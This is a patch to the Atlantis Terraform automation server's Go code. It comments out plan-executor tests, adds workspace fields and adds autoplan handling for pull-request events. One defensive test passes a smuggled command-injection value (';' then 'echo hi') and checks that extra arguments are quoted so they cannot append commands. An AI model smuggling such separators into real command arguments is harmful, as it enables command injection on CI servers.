When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) - When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace")). - ThenReturn("/tmp/clone-repo", nil) - When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})). - ThenReturn(events.PreExecuteResult{ - LockResponse: locking.TryLockResponse{ - LockKey: "key", - }, - }) - r := p.Execute(&ctx) - - runner.VerifyWasCalledOnce().RunCommandWithVersion( - ctx.Log, - "/tmp/clone-repo", - []string{ - "plan", - "-refresh", - "-no-color", - "-out", - "/tmp/clone-repo/workspace.tfplan", - "-var", - "atlantis_user=anubhavmishra", - // NOTE: extra args should be quoted to prevent an attacker from - // appending malicious commands. 
- "\"-target=resource\"", - "\"-var\"", - "\"a=b\"", - "\";\"", - "\"echo\"", - "\"hi\"", - }, - nil, - "workspace", - ) - Assert(t, len(r.ProjectResults) == 1, "exp one project result") - result := r.ProjectResults[0] - Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil") - Equals(t, "", result.PlanSuccess.TerraformOutput) - Equals(t, "lockurl-key", result.PlanSuccess.LockURL) -} - -func TestExecute_Success(t *testing.T) { - t.Log("If there are no errors, the plan should be returned") - p, runner, _ := setupPlanExecutorTest(t) - When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) - When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")). - ThenReturn("/tmp/clone-repo", nil) - When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})). - ThenReturn(events.PreExecuteResult{ - LockResponse: locking.TryLockResponse{ - LockKey: "key", - }, - }) - - r := p.Execute(&planCtx) - - runner.VerifyWasCalledOnce().RunCommandWithVersion( - planCtx.Log, - "/tmp/clone-repo", - []string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/workspace.tfplan", "-var", "atlantis_user=anubhavmishra"}, - nil, - "workspace", - ) - Assert(t, len(r.ProjectResults) == 1, "exp one project result") - result := r.ProjectResults[0] - Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil") - Equals(t, "", result.PlanSuccess.TerraformOutput) - Equals(t, "lockurl-key", result.PlanSuccess.LockURL) -} - -func TestExecute_PreExecuteResult(t *testing.T) { - t.Log("If DefaultProjectPreExecutor.Execute returns a ProjectResult we should return it") - p, _, _ := setupPlanExecutorTest(t) - When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) - When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, 
planCtx.Pull, "workspace")). - ThenReturn("/tmp/clone-repo", nil) - projectResult := events.ProjectResult{ - Failure: "failure", - } - When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})). - ThenReturn(events.PreExecuteResult{ProjectResult: projectResult}) - r := p.Execute(&planCtx) - - Assert(t, len(r.ProjectResults) == 1, "exp one project result") - result := r.ProjectResults[0] - Equals(t, "failure", result.Failure) -} - -func TestExecute_MultiProjectFailure(t *testing.T) { - t.Log("If is an error planning in one project it should be returned. It shouldn't affect another project though.") - p, runner, locker := setupPlanExecutorTest(t) - // Two projects have been modified so we should run plan in two paths. - When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"path1/file.tf", "path2/file.tf"}, nil) - When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")). - ThenReturn("/tmp/clone-repo", nil) - - // Both projects will succeed in the PreExecute stage. - When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "path1"})). - ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key1"}}) - When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "path2"})). - ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key2"}}) - - // The first project will fail when running plan - When(runner.RunCommandWithVersion( - planCtx.Log, - "/tmp/clone-repo/path1", - []string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/path1/workspace.tfplan", "-var", "atlantis_user=anubhavmishra"}, - nil, - "workspace", - )).ThenReturn("", errors.New("path1 err")) - // The second will succeed. We don't need to stub it because by default it - // will return a nil error. 
- r := p.Execute(&planCtx) - - // We expect Unlock to be called for the failed project. - locker.VerifyWasCalledOnce().Unlock("key1") - - // So at the end we expect the first project to return an error and the second to be successful. - Assert(t, len(r.ProjectResults) == 2, "exp two project results") - result1 := r.ProjectResults[0] - Assert(t, result1.Error != nil, "exp err to not be nil") - Equals(t, "path1 err\n", result1.Error.Error()) - - result2 := r.ProjectResults[1] - Assert(t, result2.PlanSuccess != nil, "exp plan success to not be nil") - Equals(t, "", result2.PlanSuccess.TerraformOutput) - Equals(t, "lockurl-key2", result2.PlanSuccess.LockURL) -} - -func TestExecute_PostPlanCommands(t *testing.T) { - t.Log("Should execute post-plan commands and return if there is an error") - p, _, _ := setupPlanExecutorTest(t) - When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) - When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")). - ThenReturn("/tmp/clone-repo", nil) - When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})). - ThenReturn(events.PreExecuteResult{ - ProjectConfig: events.ProjectConfig{PostPlan: []string{"post-plan"}}, - }) - When(p.Run.Execute(planCtx.Log, []string{"post-plan"}, "/tmp/clone-repo", "workspace", nil, "post_plan")). 
- ThenReturn("", errors.New("err")) - - r := p.Execute(&planCtx) - - Assert(t, len(r.ProjectResults) == 1, "exp one project result") - result := r.ProjectResults[0] - Assert(t, result.Error != nil, "exp plan error to not be nil") - Equals(t, "running post plan commands: err", result.Error.Error()) -} - -func setupPlanExecutorTest(t *testing.T) (*events.PlanExecutor, *tmocks.MockClient, *lmocks.MockLocker) { - RegisterMockTestingT(t) - vcsProxy := vcsmocks.NewMockClientProxy() - w := mocks.NewMockAtlantisWorkspace() - ppe := mocks.NewMockProjectPreExecutor() - runner := tmocks.NewMockClient() - locker := lmocks.NewMockLocker() - run := rmocks.NewMockRunner() - p := events.PlanExecutor{ - VCSClient: vcsProxy, - ProjectFinder: &events.DefaultProjectFinder{}, - Workspace: w, - ProjectPreExecute: ppe, - Terraform: runner, - Locker: locker, - Run: run, - } - return &p, runner, locker -} +// +//import ( +// "errors" +// "testing" +// +// "github.com/mohae/deepcopy" +// . "github.com/petergtz/pegomock" +// "github.com/runatlantis/atlantis/server/events" +// "github.com/runatlantis/atlantis/server/events/locking" +// lmocks "github.com/runatlantis/atlantis/server/events/locking/mocks" +// "github.com/runatlantis/atlantis/server/events/mocks" +// "github.com/runatlantis/atlantis/server/events/models" +// rmocks "github.com/runatlantis/atlantis/server/events/run/mocks" +// tmocks "github.com/runatlantis/atlantis/server/events/terraform/mocks" +// vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks" +// "github.com/runatlantis/atlantis/server/events/vcs/mocks/matchers" +// "github.com/runatlantis/atlantis/server/logging" +// . 
"github.com/runatlantis/atlantis/testing" +//) +// +//var planCtx = events.CommandContext{ +// Command: &events.Command{ +// Name: events.Plan, +// Workspace: "workspace", +// Dir: "", +// }, +// Log: logging.NewNoopLogger(), +// BaseRepo: models.Repo{}, +// HeadRepo: models.Repo{}, +// Pull: models.PullRequest{}, +// User: models.User{ +// Username: "anubhavmishra", +// }, +//} +// +//func TestExecute_ModifiedFilesErr(t *testing.T) { +// t.Log("If GetModifiedFiles returns an error we return an error") +// p, _, _ := setupPlanExecutorTest(t) +// When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn(nil, errors.New("err")) +// r := p.Execute(&planCtx) +// +// Assert(t, r.Error != nil, "exp .Error to be set") +// Equals(t, "getting modified files: err", r.Error.Error()) +//} +// +//func TestExecute_NoModifiedProjects(t *testing.T) { +// t.Log("If there are no modified projects we return a failure") +// p, _, _ := setupPlanExecutorTest(t) +// // We don't need to actually mock VCSClient.GetModifiedFiles because by +// // default it will return an empty slice which is what we want for this test. 
+// r := p.Execute(&planCtx) +// +// Equals(t, "No Terraform files were modified.", r.Failure) +//} +// +//func TestExecute_CloneErr(t *testing.T) { +// t.Log("If AtlantisWorkspace.Clone returns an error we return an error") +// p, _, _ := setupPlanExecutorTest(t) +// When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) +// When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).ThenReturn("", errors.New("err")) +// r := p.Execute(&planCtx) +// +// Assert(t, r.Error != nil, "exp .Error to be set") +// Equals(t, "err", r.Error.Error()) +//} +// +//func TestExecute_DirectoryAndWorkspaceSet(t *testing.T) { +// t.Log("Test that we run plan in the right directory and workspace if they're set") +// p, runner, _ := setupPlanExecutorTest(t) +// ctx := deepcopy.Copy(planCtx).(events.CommandContext) +// ctx.Log = logging.NewNoopLogger() +// ctx.Command.Dir = "dir1/dir2" +// ctx.Command.Workspace = "workspace-flag" +// +// When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace-flag")). +// ThenReturn("/tmp/clone-repo", nil) +// When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "dir1/dir2"})). 
+// ThenReturn(events.PreExecuteResult{ +// LockResponse: locking.TryLockResponse{ +// LockKey: "key", +// }, +// }) +// r := p.Execute(&ctx) +// +// runner.VerifyWasCalledOnce().RunCommandWithVersion( +// ctx.Log, +// "/tmp/clone-repo/dir1/dir2", +// []string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/dir1/dir2/workspace-flag.tfplan", "-var", "atlantis_user=anubhavmishra"}, +// nil, +// "workspace-flag", +// ) +// Assert(t, len(r.ProjectResults) == 1, "exp one project result") +// result := r.ProjectResults[0] +// Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil") +// Equals(t, "", result.PlanSuccess.TerraformOutput) +// Equals(t, "lockurl-key", result.PlanSuccess.LockURL) +//} +// +//func TestExecute_AddedArgs(t *testing.T) { +// t.Log("Test that we include extra-args added to the comment in the plan command") +// p, runner, _ := setupPlanExecutorTest(t) +// ctx := deepcopy.Copy(planCtx).(events.CommandContext) +// ctx.Log = logging.NewNoopLogger() +// ctx.Command.Flags = []string{"\"-target=resource\"", "\"-var\"", "\"a=b\"", "\";\"", "\"echo\"", "\"hi\""} +// +// When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) +// When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace")). +// ThenReturn("/tmp/clone-repo", nil) +// When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})). +// ThenReturn(events.PreExecuteResult{ +// LockResponse: locking.TryLockResponse{ +// LockKey: "key", +// }, +// }) +// r := p.Execute(&ctx) +// +// runner.VerifyWasCalledOnce().RunCommandWithVersion( +// ctx.Log, +// "/tmp/clone-repo", +// []string{ +// "plan", +// "-refresh", +// "-no-color", +// "-out", +// "/tmp/clone-repo/workspace.tfplan", +// "-var", +// "atlantis_user=anubhavmishra", +// // NOTE: extra args should be quoted to prevent an attacker from +// // appending malicious commands. 
+// "\"-target=resource\"", +// "\"-var\"", +// "\"a=b\"", +// "\";\"", +// "\"echo\"", +// "\"hi\"", +// }, +// nil, +// "workspace", +// ) +// Assert(t, len(r.ProjectResults) == 1, "exp one project result") +// result := r.ProjectResults[0] +// Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil") +// Equals(t, "", result.PlanSuccess.TerraformOutput) +// Equals(t, "lockurl-key", result.PlanSuccess.LockURL) +//} +// +//func TestExecute_Success(t *testing.T) { +// t.Log("If there are no errors, the plan should be returned") +// p, runner, _ := setupPlanExecutorTest(t) +// When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) +// When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")). +// ThenReturn("/tmp/clone-repo", nil) +// When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})). +// ThenReturn(events.PreExecuteResult{ +// LockResponse: locking.TryLockResponse{ +// LockKey: "key", +// }, +// }) +// +// r := p.Execute(&planCtx) +// +// runner.VerifyWasCalledOnce().RunCommandWithVersion( +// planCtx.Log, +// "/tmp/clone-repo", +// []string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/workspace.tfplan", "-var", "atlantis_user=anubhavmishra"}, +// nil, +// "workspace", +// ) +// Assert(t, len(r.ProjectResults) == 1, "exp one project result") +// result := r.ProjectResults[0] +// Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil") +// Equals(t, "", result.PlanSuccess.TerraformOutput) +// Equals(t, "lockurl-key", result.PlanSuccess.LockURL) +//} +// +//func TestExecute_PreExecuteResult(t *testing.T) { +// t.Log("If DefaultProjectPreExecutor.Execute returns a ProjectResult we should return it") +// p, _, _ := setupPlanExecutorTest(t) +// When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), 
matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) +// When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")). +// ThenReturn("/tmp/clone-repo", nil) +// projectResult := events.ProjectResult{ +// Failure: "failure", +// } +// When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})). +// ThenReturn(events.PreExecuteResult{ProjectResult: projectResult}) +// r := p.Execute(&planCtx) +// +// Assert(t, len(r.ProjectResults) == 1, "exp one project result") +// result := r.ProjectResults[0] +// Equals(t, "failure", result.Failure) +//} +// +//func TestExecute_MultiProjectFailure(t *testing.T) { +// t.Log("If is an error planning in one project it should be returned. It shouldn't affect another project though.") +// p, runner, locker := setupPlanExecutorTest(t) +// // Two projects have been modified so we should run plan in two paths. +// When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"path1/file.tf", "path2/file.tf"}, nil) +// When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")). +// ThenReturn("/tmp/clone-repo", nil) +// +// // Both projects will succeed in the PreExecute stage. +// When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "path1"})). +// ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key1"}}) +// When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "path2"})). 
+// ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key2"}}) +// +// // The first project will fail when running plan +// When(runner.RunCommandWithVersion( +// planCtx.Log, +// "/tmp/clone-repo/path1", +// []string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/path1/workspace.tfplan", "-var", "atlantis_user=anubhavmishra"}, +// nil, +// "workspace", +// )).ThenReturn("", errors.New("path1 err")) +// // The second will succeed. We don't need to stub it because by default it +// // will return a nil error. +// r := p.Execute(&planCtx) +// +// // We expect Unlock to be called for the failed project. +// locker.VerifyWasCalledOnce().Unlock("key1") +// +// // So at the end we expect the first project to return an error and the second to be successful. +// Assert(t, len(r.ProjectResults) == 2, "exp two project results") +// result1 := r.ProjectResults[0] +// Assert(t, result1.Error != nil, "exp err to not be nil") +// Equals(t, "path1 err\n", result1.Error.Error()) +// +// result2 := r.ProjectResults[1] +// Assert(t, result2.PlanSuccess != nil, "exp plan success to not be nil") +// Equals(t, "", result2.PlanSuccess.TerraformOutput) +// Equals(t, "lockurl-key2", result2.PlanSuccess.LockURL) +//} +// +//func TestExecute_PostPlanCommands(t *testing.T) { +// t.Log("Should execute post-plan commands and return if there is an error") +// p, _, _ := setupPlanExecutorTest(t) +// When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) +// When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")). +// ThenReturn("/tmp/clone-repo", nil) +// When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})). 
+// ThenReturn(events.PreExecuteResult{ +// ProjectConfig: events.ProjectConfig{PostPlan: []string{"post-plan"}}, +// }) +// When(p.Run.Execute(planCtx.Log, []string{"post-plan"}, "/tmp/clone-repo", "workspace", nil, "post_plan")). +// ThenReturn("", errors.New("err")) +// +// r := p.Execute(&planCtx) +// +// Assert(t, len(r.ProjectResults) == 1, "exp one project result") +// result := r.ProjectResults[0] +// Assert(t, result.Error != nil, "exp plan error to not be nil") +// Equals(t, "running post plan commands: err", result.Error.Error()) +//} +// +//func setupPlanExecutorTest(t *testing.T) (*events.PlanExecutor, *tmocks.MockClient, *lmocks.MockLocker) { +// RegisterMockTestingT(t) +// vcsProxy := vcsmocks.NewMockClientProxy() +// w := mocks.NewMockAtlantisWorkspace() +// ppe := mocks.NewMockProjectPreExecutor() +// runner := tmocks.NewMockClient() +// locker := lmocks.NewMockLocker() +// run := rmocks.NewMockRunner() +// p := events.PlanExecutor{ +// VCSClient: vcsProxy, +// ProjectFinder: &events.DefaultProjectFinder{}, +// Workspace: w, +// ProjectPreExecute: ppe, +// Terraform: runner, +// Locker: locker, +// Run: run, +// } +// return &p, runner, locker +//} diff --git a/server/events/project_result.go b/server/events/project_result.go index 94a6d3a468..ca5a1ecee4 100644 --- a/server/events/project_result.go +++ b/server/events/project_result.go @@ -18,6 +18,7 @@ import "github.com/runatlantis/atlantis/server/events/vcs" // ProjectResult is the result of executing a plan/apply for a project. 
type ProjectResult struct { Path string + Workspace string Error error Failure string PlanSuccess *PlanSuccess diff --git a/server/events/runtime/repoconfig.go b/server/events/runtime/repoconfig.go index 138f73f0db..0880920fb5 100644 --- a/server/events/runtime/repoconfig.go +++ b/server/events/runtime/repoconfig.go @@ -5,6 +5,10 @@ import ( "github.com/runatlantis/atlantis/server/logging" ) +type TerraformExec interface { + RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) +} + type ApplyRequirement interface { // IsMet returns true if the requirement is met and false if not. // If it returns false, it also returns a string describing why not. @@ -12,7 +16,9 @@ type ApplyRequirement interface { } type PlanStage struct { - Steps []Step + Steps []Step + Workspace string + ProjectPath string } type ApplyStage struct { diff --git a/server/events/yaml/project.go b/server/events/yaml/project.go index dade99baef..7a5730665f 100644 --- a/server/events/yaml/project.go +++ b/server/events/yaml/project.go @@ -1,12 +1,12 @@ package yaml type Project struct { - Dir string `yaml:"dir"` - Workspace string `yaml:"workspace"` - Workflow string `yaml:"workflow"` - TerraformVersion string `yaml:"terraform_version"` - AutoPlan *AutoPlan `yaml:"auto_plan,omitempty"` - ApplyRequirements []string `yaml:"apply_requirements"` + Dir string `yaml:"dir"` + Workspace string `yaml:"workspace"` + Workflow string `yaml:"workflow"` + TerraformVersion string `yaml:"terraform_version"` + AutoPlan AutoPlan `yaml:"auto_plan,omitempty"` + ApplyRequirements []string `yaml:"apply_requirements"` } const DefaultWorkspace = "default" @@ -17,7 +17,7 @@ func (p *Project) UnmarshalYAML(unmarshal func(interface{}) error) error { // Set up defaults. 
defaults := alias{ Workspace: DefaultWorkspace, - AutoPlan: &AutoPlan{ + AutoPlan: AutoPlan{ Enabled: true, WhenModified: []string{"**/*.tf"}, }, diff --git a/server/events_controller.go b/server/events_controller.go index b5a447be14..b5b3c73300 100644 --- a/server/events_controller.go +++ b/server/events_controller.go @@ -51,6 +51,10 @@ type EventsController struct { // startup to support. SupportedVCSHosts []models.VCSHostType VCSClient vcs.ClientProxy + // AtlantisGithubUser is the user that atlantis is running as for Github. + AtlantisGithubUser models.User + // AtlantisGitlabUser is the user that atlantis is running as for Gitlab. + AtlantisGitlabUser models.User } // Post handles POST webhook requests. @@ -118,34 +122,76 @@ func (e *EventsController) HandleGithubCommentEvent(w http.ResponseWriter, event // request if the event is a pull request closed event. It's exported to make // testing easier. func (e *EventsController) HandleGithubPullRequestEvent(w http.ResponseWriter, pullEvent *github.PullRequestEvent, githubReqID string) { - pull, _, err := e.Parser.ParseGithubPull(pullEvent.PullRequest) + pull, headRepo, err := e.Parser.ParseGithubPull(pullEvent.PullRequest) if err != nil { e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing pull data: %s %s", err, githubReqID) return } - repo, err := e.Parser.ParseGithubRepo(pullEvent.Repo) + baseRepo, err := e.Parser.ParseGithubRepo(pullEvent.Repo) if err != nil { e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing repo data: %s %s", err, githubReqID) return } - e.handlePullRequestEvent(w, repo, pull) + var eventType string + switch pullEvent.GetAction() { + case "opened": + eventType = OpenPullEvent + case "synchronize": + eventType = UpdatedPullEvent + case "closed": + eventType = ClosedPullEvent + default: + eventType = OtherPullEvent + } + e.handlePullRequestEvent(w, baseRepo, headRepo, pull, e.AtlantisGithubUser, eventType) } -func (e *EventsController) handlePullRequestEvent(w 
http.ResponseWriter, repo models.Repo, pull models.PullRequest) { - if !e.RepoWhitelist.IsWhitelisted(repo.FullName, repo.VCSHost.Hostname) { +const OpenPullEvent = "opened" +const UpdatedPullEvent = "updated" +const ClosedPullEvent = "closed" +const OtherPullEvent = "other" + +func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User, eventType string) { + if !e.RepoWhitelist.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) { + // If the repo isn't whitelisted and we receive an opened pull request + // event we comment back on the pull request that the repo isn't + // whitelisted. This is because the user might be expecting Atlantis to + // autoplan. For other events, we just ignore them. + if eventType == OpenPullEvent { + e.commentNotWhitelisted(w, baseRepo, pull.Num) + } e.respond(w, logging.Debug, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo") return } - if pull.State != models.Closed { - e.respond(w, logging.Debug, http.StatusOK, "Ignoring opened pull request event") + + switch eventType { + case OpenPullEvent, UpdatedPullEvent: + // If the pull request was opened or updated, we will try to autoplan. + + // Respond with success and then actually execute the command asynchronously. + // We use a goroutine so that this function returns and the connection is + // closed. + fmt.Fprintln(w, "Processing...") + // We use a Command to represent autoplanning but we set dir and + // workspace to '*' to indicate that all applicable dirs and workspaces + // should be planned. 
+ autoplanCmd := events.NewCommand("*", nil, events.Plan, false, "*", true) + go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd) return - } - if err := e.PullCleaner.CleanUpPull(repo, pull); err != nil { - e.respond(w, logging.Error, http.StatusInternalServerError, "Error cleaning pull request: %s", err) + case ClosedPullEvent: + // If the pull request was closed, we delete locks. + if err := e.PullCleaner.CleanUpPull(baseRepo, pull); err != nil { + e.respond(w, logging.Error, http.StatusInternalServerError, "Error cleaning pull request: %s", err) + return + } + e.Logger.Info("deleted locks and workspace for repo %s, pull %d", baseRepo.FullName, pull.Num) + fmt.Fprintln(w, "Pull request cleaned successfully") + return + case OtherPullEvent: + // Else we ignore the event. + e.respond(w, logging.Debug, http.StatusOK, "Ignoring opened pull request event") return } - e.Logger.Info("deleted locks and workspace for repo %s, pull %d", repo.FullName, pull.Num) - fmt.Fprintln(w, "Pull request cleaned successfully") } func (e *EventsController) handleGitlabPost(w http.ResponseWriter, r *http.Request) { @@ -191,10 +237,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo // At this point we know it's a command we're not supposed to ignore, so now // we check if this repo is allowed to run commands in the first place. if !e.RepoWhitelist.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) { - errMsg := "```\nError: This repo is not whitelisted for Atlantis.\n```" - if err := e.VCSClient.CreateComment(baseRepo, pullNum, errMsg); err != nil { - e.Logger.Err("unable to comment on pull request: %s", err) - } + e.commentNotWhitelisted(w, baseRepo, pullNum) e.respond(w, logging.Warn, http.StatusForbidden, "Repo not whitelisted") return } @@ -222,12 +265,23 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo // request if the event is a merge request closed event. 
It's exported to make // testing easier. func (e *EventsController) HandleGitlabMergeRequestEvent(w http.ResponseWriter, event gitlab.MergeEvent) { - pull, repo, err := e.Parser.ParseGitlabMergeEvent(event) + pull, baseRepo, headRepo, err := e.Parser.ParseGitlabMergeEvent(event) if err != nil { e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing webhook: %s", err) return } - e.handlePullRequestEvent(w, repo, pull) + var eventType string + switch event.ObjectAttributes.Action { + case "open": + eventType = OpenPullEvent + case "update": + eventType = UpdatedPullEvent + case "merge", "close": + eventType = ClosedPullEvent + default: + eventType = OtherPullEvent + } + e.handlePullRequestEvent(w, baseRepo, headRepo, pull, e.AtlantisGitlabUser, eventType) } // supportsHost returns true if h is in e.SupportedVCSHosts and false otherwise. @@ -246,3 +300,12 @@ func (e *EventsController) respond(w http.ResponseWriter, lvl logging.LogLevel, w.WriteHeader(code) fmt.Fprintln(w, response) } + +// commentNotWhitelisted comments on the pull request that the repo is not +// whitelisted. 
+func (e *EventsController) commentNotWhitelisted(w http.ResponseWriter, baseRepo models.Repo, pullNum int) { + errMsg := "```\nError: This repo is not whitelisted for Atlantis.\n```" + if err := e.VCSClient.CreateComment(baseRepo, pullNum, errMsg); err != nil { + e.Logger.Err("unable to comment on pull request: %s", err) + } +} diff --git a/server/server.go b/server/server.go index 8ae0e5b6eb..368553a0ea 100644 --- a/server/server.go +++ b/server/server.go @@ -37,7 +37,6 @@ import ( "github.com/runatlantis/atlantis/server/events/locking/boltdb" "github.com/runatlantis/atlantis/server/events/models" "github.com/runatlantis/atlantis/server/events/run" - "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" "github.com/runatlantis/atlantis/server/events/webhooks" @@ -201,10 +200,11 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { ConfigReader: configReader, Terraform: terraformClient, } - executionPlanner := &runtime.ExecutionPlanner{ + executionPlanner := &events.ExecutionPlanner{ ParserValidator: &yaml.ParserValidator{}, DefaultTFVersion: terraformClient.Version(), TerraformExecutor: terraformClient, + ProjectFinder: &events.DefaultProjectFinder{}, } underlyingRouter := mux.NewRouter() router := &Router{ @@ -289,6 +289,8 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { RepoWhitelist: repoWhitelist, SupportedVCSHosts: supportedVCSHosts, VCSClient: vcsClient, + AtlantisGithubUser: models.User{Username: userConfig.GithubUser}, + AtlantisGitlabUser: models.User{Username: userConfig.GitlabUser}, } return &Server{ AtlantisVersion: config.AtlantisVersion, From f59fe33a4cc7df80b4677a10e5edb690422acb7a Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Tue, 12 Jun 2018 18:43:22 +0100 Subject: [PATCH 19/69] Parse YAML without defaults/validation. 
--- server/events/execution_planner.go | 6 +- server/events/yaml/auto_plan.go | 8 +- server/events/yaml/auto_plan_test.go | 36 +- server/events/yaml/config.go | 7 - server/events/yaml/config_test.go | 74 -- server/events/yaml/parser_validator.go | 43 +- server/events/yaml/parser_validator_test.go | 1002 +++++++++---------- server/events/yaml/project.go | 32 +- server/events/yaml/project_test.go | 32 +- server/events/yaml/spec.go | 7 + server/events/yaml/spec_test.go | 152 +++ server/events/yaml/stage.go | 2 +- server/events/yaml/stage_test.go | 47 + server/events/yaml/step.go | 61 ++ server/events/yaml/step_config.go | 82 -- server/events/yaml/step_config_test.go | 159 --- server/events/yaml/step_test.go | 134 +++ server/events/yaml/workflow.go | 58 +- server/events/yaml/workflow_test.go | 92 +- server/events/yaml/yaml_test.go | 13 + testing/assertions.go | 8 +- 21 files changed, 1022 insertions(+), 1033 deletions(-) delete mode 100644 server/events/yaml/config.go delete mode 100644 server/events/yaml/config_test.go create mode 100644 server/events/yaml/spec.go create mode 100644 server/events/yaml/spec_test.go create mode 100644 server/events/yaml/stage_test.go create mode 100644 server/events/yaml/step.go delete mode 100644 server/events/yaml/step_config.go delete mode 100644 server/events/yaml/step_config_test.go create mode 100644 server/events/yaml/step_test.go create mode 100644 server/events/yaml/yaml_test.go diff --git a/server/events/execution_planner.go b/server/events/execution_planner.go index e6e928c24b..415ed2da18 100644 --- a/server/events/execution_planner.go +++ b/server/events/execution_planner.go @@ -135,7 +135,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge // We have a workflow defined, so now we need to build it. 
